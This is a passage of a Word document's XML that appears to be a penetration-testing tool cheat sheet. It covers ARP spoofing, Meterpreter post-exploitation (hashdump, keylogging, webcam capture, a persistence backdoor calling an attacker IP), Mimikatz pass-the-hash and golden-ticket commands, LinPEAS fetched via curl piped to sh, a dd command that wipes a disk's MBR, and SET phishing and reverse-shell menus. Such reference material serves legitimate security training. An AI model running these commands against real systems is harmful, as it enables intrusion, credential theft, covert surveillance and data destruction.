man-in-the-middle interception.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1 &gt; /proc/sys/net/ipv4/ip_forward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Enables kernel IP forwarding so intercepted packets are relayed to their real destination, preventing the victim from losing connectivity.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1 &gt; /proc/sys/net/ipv4/ip_forward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arpspoof -i &lt;interface&gt; -t &lt;target-ip&gt; &lt;gateway-ip&gt;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Sends continuous forged ARP replies to the victim, poisoning its ARP cache so it sends all traffic destined for the gateway to the attacker instead.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arpspoof -i eth0 -t 192.168.1.50 192.168.1.1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arpspoof -i &lt;interface&gt; -t &lt;target-ip&gt; -r &lt;gateway-ip&gt;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Poisons both the target and the gateway simultaneously with a single command using the -r flag, ensuring full bidirectional interception.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arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1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-i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Network interface to send forged ARP packets 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IP address of the target host whose ARP cache will be poisoned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-r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Poison both directions (victim and gateway) simultaneously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Establishing a simple man-in-the-middle position on a LAN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Capturing cleartext credentials passing between a host and the gateway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Redirecting a target's traffic through a transparent proxy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Demonstrating ARP poisoning vulnerabilities in security awareness training</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools used after initial access for privilege escalation, persistence, and data extraction.</w:t>
      </w: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Meterpreter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Remote Shell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Metasploit's advanced in-memory payload that provides an encrypted, extensible post-exploitation shell with file transfer, keylogging, screenshot, and pivoting capabilities.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sysinfo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Returns the computer name, operating system version, architecture, and Meterpreter/session type of the compromised host.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sysinfo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getuid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Displays the Windows or Unix username under which the Meterpreter session is currently running.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getuid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getsystem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Attempts multiple privilege escalation techniques (named pipe impersonation, token duplication) to elevate from a standard user to SYSTEM on Windows.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getsystem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hashdump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Dumps NTLM password hashes from the Windows SAM database. Requires SYSTEM-level privileges. Hashes can be passed or cracked offline.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hashdump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download &lt;remote-path&gt; &lt;local-path&gt;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Copies a file from the compromised host to the attacker's machine over the encrypted Meterpreter channel.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download /etc/passwd /home/kali/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upload &lt;local-path&gt; &lt;remote-path&gt;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Transfers a file from the attacker's machine to the compromised host.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upload /home/kali/tool.sh /tmp/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screenshot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Captures the current desktop screenshot of the compromised host and saves it locally on the attacker's machine.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screenshot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webcam_snap -i &lt;camera-index&gt;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Takes a still photo from the specified webcam index on the target system. Use webcam_list to enumerate available cameras first.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webcam_snap -i 1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keyscan_start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Activates the kernel-level keylogger on the target host. Keystrokes are buffered in memory until retrieved with keyscan_dump.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keyscan_start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keyscan_dump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Retrieves and displays all buffered keystrokes captured since keyscan_start was executed.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keyscan_dump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shell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Opens a native command shell (cmd.exe on Windows, /bin/sh on Linux) on the target. Press CTRL+Z to background and return to Meterpreter.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shell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run persistence -S -i &lt;interval&gt; -p &lt;port&gt; -r &lt;attacker-ip&gt;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Installs a persistent Meterpreter backdoor that reconnects to the attacker at a set interval (-i seconds). -S installs as a service on Windows.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run persistence -S -i 30 -p 4444 -r 192.168.1.100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Conducting post-exploitation after gaining initial access via Metasploit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Dumping credentials for lateral movement through a network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Establishing persistent access for long-term red-team assessments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Pivoting to isolated network segments through a compromised host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Collecting evidence of sensitive data exposure (files, screenshots, keystrokes)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Mimikatz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Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b91c1c"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="red"/>
          <w:highlightCs w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADVANCED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Windows credential extraction tool that dumps plaintext passwords, NTLM hashes, Kerberos tickets, and enables pass-the-hash and golden ticket attacks.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sekurlsa::logonpasswords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Reads the LSASS process memory and extracts all available credentials — plaintext passwords (where WDigest is enabled), NTLM hashes, and Kerberos tickets — for all logged-on users.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sekurlsa::logonpasswords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lsadump::sam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Extracts NTLM hashes of all local user accounts from the Security Account Manager database. Requires SYSTEM privileges.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lsadump::sam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lsadump::secrets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Retrieves LSA secrets from the registry, which can include service account passwords, DPAPI master keys, and cached domain credentials.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lsadump::secrets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sekurlsa::pth /user:&lt;username&gt; /domain:&lt;domain&gt; /ntlm:&lt;hash&gt; /run:cmd.exe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Spawns a new process (cmd.exe) authenticated with the provided NTLM hash without needing the plaintext password, enabling lateral movement to other systems that accept the same credentials.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sekurlsa::pth /user:admin /domain:. /ntlm:aad3b435b51404eeaad3b435b51404ee /run:cmd.exe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kerberos::golden /user:&lt;username&gt; /domain:&lt;domain&gt; /sid:&lt;domain-SID&gt; /krbtgt:&lt;hash&gt; /id:500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Creates a forged Kerberos TGT (golden ticket) using the krbtgt account NTLM hash, granting persistent domain admin access valid for 10 years by default.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kerberos::golden /user:admin /domain:lab.local /sid:S-1-5-21-3456789012-987654321-1234567890 /krbtgt:8e6a4b9c3d1f7a2e5c8b0d4f6e9a1c3d /id:500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Extracting credentials after gaining SYSTEM access on a Windows host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Performing pass-the-hash lateral movement across a Windows domain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Demonstrating the impact of credential exposure in Active Directory environments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Forging Kerberos tickets during advanced red-team domain compromise simulations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Recovering service account passwords stored as LSA secrets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LinPEAS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Privilege Escalation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Automated Linux privilege escalation enumeration script that highlights potential vectors including SUID binaries, writable paths, cron jobs, and kernel exploits.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curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh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Fetches the latest linpeas.sh from GitHub and pipes it directly to sh. Does not write any file to disk. Requires internet access from the target.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curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh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curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | tee /tmp/linpeas_out.txt | sh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Runs linpeas and simultaneously saves the output to a file for later review or exfiltration.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curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | tee /tmp/linpeas_out.txt | sh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./linpeas.sh -q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After transferring linpeas.sh to the target, runs it with reduced output, showing only high and critical severity findings.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chmod +x linpeas.sh &amp;&amp; ./linpeas.sh -q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Quickly enumerating privilege escalation paths on a freshly compromised Linux host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Identifying SUID binaries, writable cron jobs, and sudo misconfigurations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Checking the kernel version against known local privilege escalation exploits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Auditing Linux system hardening as part of a security review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WinPEAS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Privilege Escalation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Windows privilege escalation enumeration tool that audits the local system for misconfigurations, weak service permissions, unquoted paths, and credential storage.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winPEASx64.exe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Runs all enumeration checks on a 64-bit Windows system and prints colour-coded results to the console. Run from a Meterpreter shell or directly on the target.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winPEASx64.exe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winPEASx64.exe quiet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Suppresses the banner and less-important informational checks, printing only medium, high, and critical findings for faster review.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winPEASx64.exe quiet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winPEAS.bat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Runs the batch script version of WinPEAS on systems where executing unsigned C# binaries is restricted. Fewer checks than the EXE but requires no .NET runtime.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winPEAS.bat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Identifying privilege escalation paths on compromised Windows systems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Finding weak service permissions and unquoted service paths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Discovering stored credentials in the registry, files, and browser profiles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Checking AlwaysInstallElevated and other common Windows misconfigurations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Pspy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Process Monitoring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Unprivileged Linux process monitor that watches for new process executions in real time, revealing cron jobs, scripts, and commands run by other users.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./pspy64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Monitors process creation on a 64-bit Linux system. All new processes are printed to stdout with UID, PID, command, and timestamp.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./pspy64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./pspy32 -pf -i 1000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Runs the 32-bit binary with file system event monitoring (-f) and a 1000ms interval (-i) between /proc scans. Use on 32-bit targets or where inotify is available.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./pspy32 -pf -i 1000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Discovering cron jobs and scheduled tasks running as root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Identifying scripts called by privileged processes that are writable by the current user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Monitoring a compromised host for periodic maintenance scripts to exploit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Observing application behaviour without triggering AV or audit logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary analysis, disassembly, and debugging tools for understanding compiled software.</w:t>
      </w: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Ghidra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Disassembler &amp; Decompiler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b91c1c"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="red"/>
          <w:highlightCs w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADVANCED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NSA-developed open-source reverse engineering suite featuring a multi-architecture decompiler, scripting API, and collaborative analysis capabilities.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ghidraRun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Opens the Ghidra project manager GUI. Create or open a project, then import a binary to begin analysis.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ghidraRun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analyzeHeadless &lt;project-dir&gt; &lt;ProjectName&gt; -import &lt;binary&gt;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Runs Ghidra analysis non-interactively from the command line. Useful for batch processing or CI pipeline integration.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analyzeHeadless /tmp/ghidra_projects MyProject -import /home/kali/targets/crackme.elf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analyzeHeadless &lt;project-dir&gt; &lt;ProjectName&gt; -import &lt;binary&gt; -postScript &lt;Script.java&gt;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Imports a binary, runs full auto-analysis, then executes a custom post-analysis script to extract strings, functions, or other data automatically.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analyzeHeadless /tmp/ghidra_projects MyProject -import crackme.elf -postScript ExtractStrings.java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Decompiling and analysing malware samples without source code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Reverse engineering proprietary binary protocols for vulnerability research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Analysing firmware images from embedded devices and routers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CTF binary challenges requiring decompilation and logic reconstruction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Comparing binary versions to identify security patches and diff vulnerabilities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Radare2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Disassembler &amp; Debugger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b91c1c"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="red"/>
          <w:highlightCs w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADVANCED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Portable, scriptable reverse engineering framework providing disassembly, debugging, binary patching, and forensics for a wide range of architectures.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r2 &lt;binary&gt;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Opens the specified binary in radare2 in read-only mode. The r2 prompt appears ready for commands.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r2 /home/kali/targets/crackme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r2 -d &lt;binary&gt;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Spawns the binary as a child process under r2's integrated debugger. Use dc (continue), db (breakpoint), and ds (step) to control execution.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r2 -d /home/kali/targets/crackme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aaa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Runs comprehensive auto-analysis: identifies functions, cross-references, strings, and imports. Run this after opening a binary before disassembling.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aaa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pdf @ &lt;function&gt;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the disassembly of the function at the given location. Use "@ main" to disassemble main(), or "@ sym.funcname" for a named symbol.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pdf @ main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afl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Lists all functions identified during analysis with their addresses, sizes, and names. Use to navigate the binary's function landscape.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afl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 &lt;address&gt;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Moves the current seek position to the given address or symbol name. Subsequent commands operate relative to this position.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 0x080484c0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 the binary in debug mode (spawn a child process)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-w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 binary in write mode to allow patching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-A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 aaa analysis automatically on open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-q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Quiet mode — suppress banner and prompts (useful for scripting)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-c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Execute a radare2 command string immediately after opening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Disassembling and analysing CTF binary challenges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Patching binaries to bypass license checks or anti-debugging routines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Debugging exploits and studying shellcode execution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Reverse engineering stripped binaries with no symbol information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Scriptable analysis pipelines using r2pipe automation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GDB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Debugger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b91c1c"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="red"/>
          <w:highlightCs w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADVANCED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GNU debugger for C/C++ and assembly programs, widely used for exploit development, binary analysis, and crash debugging on Linux and other platforms.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gdb ./&lt;binary&gt;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Loads the specified binary into GDB without starting execution. Set breakpoints before running.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gdb ./vuln_binary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run &lt;arg1&gt; &lt;arg2&gt;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Starts the loaded program with the specified command-line arguments. Execution pauses at the first breakpoint or on a fault.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run arg1 AAAAAAAAAAAAAAAA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break &lt;location&gt;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Sets a breakpoint at a function name or a specific memory address. Execution will pause before that instruction is executed.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break main
break *0x080484c0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x/&lt;count&gt;&lt;format&gt; &lt;address&gt;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Reads memory at the given address. Format codes: x (hex), d (decimal), s (string), i (instruction). Count specifies the number of units to print.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x/20x $esp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info registers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Displays the current values of all CPU registers. Use "p $eax" to print a single register, or "info registers eip" for a specific one.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info registers
p $eax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Analysing crashes and determining exploitability (EIP/RIP control)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Writing and testing buffer overflow exploits step by step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Reverse engineering stripped binaries by dynamic analysis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Debugging shellcode execution in controlled environments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Understanding function call conventions and stack frame layouts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Objdump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Binary Analysis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GNU binutils disassembler and object file analyser that extracts sections, headers, symbol tables, and disassembly from ELF, PE, and other binary formats.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objdump -d &lt;binary&gt;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Disassembles all executable sections in the binary and prints the output in the default (AT&amp;T) syntax.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objdump -d /home/kali/targets/crackme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objdump -M intel -d &lt;binary&gt;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Produces Intel-syntax disassembly, which is preferred by many security researchers and is consistent with NASM/MASM notation.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objdump -M intel -d /home/kali/targets/crackme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objdump -x &lt;binary&gt;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Prints all available header information: file headers, section headers, symbol table, and dynamic relocation entries.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objdump -x /home/kali/targets/crackme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objdump -t &lt;binary&gt;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Lists all symbols (functions and global variables) with their addresses, sizes, and visibility — useful for identifying function entry points in partially stripped binaries.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objdump -t /home/kali/targets/crackme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Disassemble only executable sections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Disassemble all sections including data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-M intel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 Intel disassembly syntax instead of default AT&amp;T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-x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 all headers (file, section, and symbol table)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 the symbol table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 full contents of all sections in hex and ASCII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Quick static disassembly without loading a full debugger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Finding ROP gadget candidates in binaries and libraries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Verifying binary security features (NX, stack protector, RELRO)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Examining library symbol exports for exploit development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Binwalk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Firmware Analysis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Firmware analysis and extraction tool that scans binary files for embedded file signatures, compressed archives, and file system images.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binwalk &lt;firmware.bin&gt;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Scans the binary file and prints all identified embedded file signatures with their offsets, without extracting anything.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binwalk firmware.bin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binwalk -e &lt;firmware.bin&gt;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Extracts all embedded components identified during scanning into a directory named _firmware.bin.extracted/ in the current directory.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binwalk -e firmware.bin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binwalk -E &lt;firmware.bin&gt;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Generates a graphical entropy plot of the firmware. High entropy (near 1.0) indicates encryption or compression; low entropy indicates structured/code regions.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binwalk -E firmware.bin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binwalk -Me &lt;firmware.bin&gt;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Combines Matryoshka recursive mode with extraction, unpacking nested archives and file systems automatically.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binwalk -Me firmware.bin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Extract all identified embedded files and file systems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Plot Shannon entropy to identify compressed/encrypted regions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-M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Matryoshka extraction — recursively extract files within extracted files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Manually specify a file type to extract, e.g. -D "jpeg image:jpg"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-B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Raw signature scan without using the default binwalk signature database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Extracting the root file system from router and IoT firmware images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Identifying embedded credentials, private keys, and hardcoded secrets in firmware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Analysing encrypted firmware regions to determine protection mechanisms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Comparing two firmware versions to identify changes and security patches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital forensics tools for evidence collection, memory analysis, and file recovery.</w:t>
      </w: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Volatility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Memory Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b91c1c"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="red"/>
          <w:highlightCs w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADVANCED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The industry-standard open-source memory forensics framework for extracting digital artefacts from RAM dumps, virtual machine snapshots, and hibernation files.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volatility -f &lt;memory.dmp&gt; imageinfo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Analyses the memory dump and suggests the appropriate OS profile to use for further analysis. Always run this first on an unknown image.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volatility -f memory.dmp imageinfo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volatility -f &lt;memory.dmp&gt; --profile=&lt;Profile&gt; pslist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Lists all processes that were running at the time of the memory capture, showing PID, PPID, name, and start time.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volatility -f memory.dmp --profile=WinXPSP2x86 pslist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volatility -f &lt;memory.dmp&gt; --profile=&lt;Profile&gt; netscan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Enumerates active and recently closed network connections and listening sockets from the memory image.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volatility -f memory.dmp --profile=Win7SP1x86 netscan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volatility -f &lt;memory.dmp&gt; --profile=&lt;Profile&gt; dumpfiles -Q &lt;offset&gt; -D &lt;output-dir&gt;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Extracts a file cached in memory at the specified physical offset into the output directory. Use filescan first to find file offsets.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volatility -f memory.dmp --profile=Win7SP1x86 dumpfiles -Q 0x3e4a3418 -D /home/kali/output/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volatility -f &lt;memory.dmp&gt; --profile=&lt;Profile&gt; hashdump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Extracts NTLM password hashes from the SYSTEM and SAM registry hives loaded in memory.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volatility -f memory.dmp --profile=Win7SP1x86 hashdump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volatility -f &lt;memory.dmp&gt; --profile=&lt;Profile&gt; cmdscan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Scans memory for COMMAND_HISTORY structures in cmd.exe processes to recover recently typed commands.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volatility -f memory.dmp --profile=Win7SP1x86 cmdscan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-f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Path to the memory image file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--profile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OS profile to use, e.g. Win7SP1x86, WinXPSP2x86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Output directory for dumped files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-Q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Physical offset of a specific object to dump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Filter by specific process ID (PID)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Performing post-incident memory analysis to identify malware and attacker activity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Recovering encryption keys and credentials from running processes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Reconstructing attacker commands and lateral movement from cmd.exe history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Detecting rootkits and hidden processes using cross-view process listing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Extracting malware payloads injected into legitimate process memory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Foremost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File Recovery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Console-based file carving utility that recovers deleted files from disk images by scanning for file headers and footers.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foremost -i &lt;disk.img&gt; -o &lt;output-dir&gt;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Carves all supported file types from the disk image and writes recovered files to the output directory, organised by type in subdirectories.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foremost -i disk.img -o /home/kali/recovered/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foremost -t &lt;types&gt; -i &lt;disk.img&gt; -o &lt;output-dir&gt;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Limits carving to the specified file types, reducing processing time and output volume.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foremost -t jpg,pdf -i disk.img -o /home/kali/recovered/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foremost -i /dev/sdb -o &lt;output-dir&gt;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Reads directly from a block device rather than a file image. Useful for live acquisition analysis.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foremost -i /dev/sdb -o /home/kali/recovered/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-i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Input file (disk image, dd dump, or raw device)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-o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Output directory for recovered files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Comma-separated list of file types to recover (e.g. jpg,pdf,zip)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-v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Verbose mode — log all activity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-q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Quick mode — only search for file headers, not footers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-a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Write audit only — log what would be recovered without extracting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Recovering deleted photos, documents, and archives from seized storage media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Carving files from unallocated disk space during forensic investigations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Extracting files from corrupted or partially overwritten file systems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Recovering evidence from formatted drives in incident response cases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ExifTool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Metadata Analysis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Platform-independent Perl library and command-line application for reading, writing, and removing metadata from images, documents, audio, and video files.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exiftool &lt;file&gt;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Displays all available metadata fields and values from the specified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exiftool image.jpg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exiftool -&lt;Tag&gt;="&lt;value&gt;" &lt;file&gt;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Sets the value of a specific metadata tag. ExifTool creates a backup copy (file_original) before modifying.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exiftool -Author="Anonymous" file.pdf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exiftool -all= &lt;file&gt;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Strips all metadata from the file. A backup is created with the _original suffix. Use -overwrite_original to skip the backup.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exiftool -all= image.jpg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exiftool -csv -r &lt;directory&gt;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Recursively reads metadata from all files in a directory and outputs everything as CSV, suitable for spreadsheet analysis or grepping for sensitive fields.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exiftool -csv -r /home/kali/evidence/ &gt; metadata.csv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-all=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Remove all metadata from a file (write mode)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-Author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Read or write the Author metadata field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-GPS*=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Remove all GPS-related metadata fields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-r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Recursive mode — process all files in a directory tree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-ext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Filter by file extension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-csv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Output metadata in CSV format for batch analysis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Extracting GPS location data from photos to determine where an image was taken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Identifying document authorship and editing history from Office metadata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Stripping identifying metadata before publishing images publicly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Discovering software versions and hostnames leaked in document properties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Steghide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Steganography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Steganography tool that embeds and extracts hidden files within JPEG, BMP, WAV, and AU cover files using passphrase-protected encryption.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steghide embed -cf &lt;cover-file&gt; -sf &lt;secret-file&gt; -p &lt;passphrase&gt;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Hides the secret file inside the cover image/audio, protecting it with a passphrase. The original cover file is overwritten with the stego file.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steghide embed -cf image.jpg -sf secret.txt -p "S3cur3P@ss"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steghide extract -sf &lt;stego-file&gt;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Extracts the hidden data from the stego file. Prompts for the passphrase interactively. Use -p to supply it non-interactively.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steghide extract -sf image.jpg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steghide info &lt;stego-file&gt;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Displays metadata about any hidden payload in the file — embedded filename, size, and encryption algorithm — without extracting it.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steghide info image.jpg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embed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Embed a secret file into a cover file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extract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Extract a hidden file from a stego file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info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 information about an embedded payload without extracting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-cf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Cover file (the carrier image or audio)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-sf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Stego file — the secret file to embed, or the stego file to extract from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Passphrase to use for encryption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-f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Force overwrite of existing output files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Solving CTF steganography challenges involving hidden data in images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Identifying steganographic data concealment during forensic investigations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Demonstrating data exfiltration techniques using image files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Covert file transfer testing during red-team exercises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dd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Disk Imaging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Low-level Unix utility for creating bit-for-bit copies of block devices, wiping disks, and converting raw data — the foundational tool for forensic disk imaging.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dd if=&lt;source-device&gt; of=&lt;image.img&gt; bs=512 conv=noerror,sync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Creates a bit-for-bit image of the source device. conv=noerror continues past read errors; conv=sync zero-pads unreadable sectors to maintain correct offsets.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dd if=/dev/sdb of=/home/kali/evidence/disk.img bs=512 conv=noerror,sync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dd if=/dev/zero of=&lt;device&gt; bs=512 count=1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Overwrites the first 512-byte sector (Master Boot Record) of a disk with zeros, effectively wiping the partition table and MBR boot code.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dd if=/dev/zero of=/dev/sdb bs=512 count=1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dd if=&lt;image.img&gt; of=&lt;destination-device&gt; bs=512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Writes a previously created disk image back to a physical device, restoring it to the exact state captured in the image.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dd if=/home/kali/evidence/disk.img of=/dev/sdc bs=512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dd if=&lt;source&gt; of=&lt;destination&gt; bs=4M status=progress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Copies data with a live progress indicator showing bytes transferred, rate, and estimated time remaining.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dd if=/dev/sdb of=/home/kali/evidence/disk.img bs=4M status=progress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if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Input file or device path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of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Output file or device path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bs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Block size for reads and writes (e.g. 512, 4096, 1M)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count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Number of blocks to copy before stopping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skip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Skip N input blocks before starting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seek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Skip N output blocks before writing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conv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Conversion options: noerror (skip read errors), sync (pad errors with zeros)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Creating forensically sound bit-for-bit copies of evidence drives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Wiping sensitive disks before decommissioning hardware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Restoring backup images to replacement hardware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Extracting specific partitions or sectors for focused analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing simulation and social engineering attack frameworks.</w:t>
      </w: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Social-Engineer Toolkit (SET)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Phishing &amp; Exploitation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Python-driven social engineering framework providing menu-guided attack vectors including credential harvesting, spear phishing, site cloning, and payload delivery.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setoolkit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Starts the Social-Engineer Toolkit and presents the main menu. All attack configuration is done through numbered menu selections.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setoolkit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setoolkit → 1 → 2 → 3 → 2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Navigates to Social-Engineering Attacks (1) &gt; Website Attack Vectors (2) &gt; Credential Harvester Attack Method (3) &gt; Site Cloner (2). Enter the URL to clone and SET captures all submitted credentials.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setoolkit
# Select: 1 &gt; 2 &gt; 3 &gt; 2
# Enter IP for listener: 192.168.1.100
# Enter URL to clone: https://target.com/login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setoolkit → 1 → 1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Navigates to Spear-Phishing Attack Vectors. Create a targeted email with a malicious attachment (PDF, Word macro, executable) that opens a Meterpreter session on the victim's machine.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setoolkit
# Select: 1 &gt; 1
# Follow prompts for payload, sender address, and target email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setoolkit → 1 → 2 → 6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Creates a cloned website serving a malicious HTA (HTML Application) that executes when visited by a Windows user, delivering a reverse shell.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setoolkit
# Select: 1 &gt; 2 &gt; 6
# Enter IP for listener: 192.168.1.100
# Enter URL to clone: https://target.com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Simulating phishing campaigns to test employee security awareness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Cloning login pages to demonstrate credential theft to clients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Creating malicious email attachments for penetration test scenarios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Testing web proxy and email gateway filtering controls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Demonstrating USB drop attack payloads during physical security assessments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GoPhish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Phishing Simulation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Open-source phishing simulation framework with a web dashboard for building, launching, and tracking phishing campaigns against target user groups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Install: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="4"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f1f5f9" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
